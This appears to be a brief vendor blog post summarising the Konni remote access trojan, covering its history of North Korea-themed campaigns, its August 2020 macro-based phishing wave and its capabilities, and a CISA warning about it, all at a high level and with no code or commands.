After remaining unnoticed for over three years, the Konni remote access trojan (RAT) has now sprung back in action. as per the US Cybersecurity and Infrastructure Security Agency (CISA), this RAT has been active since 2014 but it has been grabbing attention only recently.
The Backstory –
The Konni malware authors seem to have an inclination towards North Korea as researchers have observed in the past
- A US government agency was targeted by the Konni malware and other associated malware allegedly due to its ongoing geopolitical relations issues surrounding North Korea, in January 2020.
- In 2017, a campaign was launched by Konni targeting United Nations, UNICEF, and other embassies all linked to North Korea. Various, organizations in North Korea were also targeted with the use of Inexmar malware and lures based on several North Korean affairs.
- In October 2018, Researchers had found links between KONNI malware and NOKKI malware. They also found a link between KONNI attacks and the DarkHotel campaigns against North Korea in August 2017.
What Transpired Recently?
In August 2020, a new wave of phishing attack was found delivering the Konni Rat to its victims.
- Apart from stealing credentials from major browsers, the malware can now log keystrokes, steal files, capture screenshots, collect information about the infected system.
- Microsoft Word documents are weaponized by adding malicious Visual Basic Application (VBA) macro code to deploy the KONNI malware.
- This malicious code has the ability to change the font color from light grey to black (to trick the victim into enabling content), check whether the Windows OS is a 32-bit or 64-bit version, and run commands to download additional files.
Warning from the CISA
The CISA published a warning regarding these recent attacks delivering the Konni Trojan.
- A list of MITRE ATT&CK techniques associated with Konni RAT and Snort signatures for use in detecting Konni malware exploits were also published by them.
- To strengthen the security posture of their organization’s systems, the document has recommended users and administrators to follow best practices
The Konni malware appears to be geared towards espionage against targets who would be interested in North Korean affairs, apart from targeting organizations in the US. Researchers are expecting new tie-ups with other malware families, or even new variants of KONNI popping up with additional capabilities, as well as better ways of evading detection.
To read more, please check eScan Blog
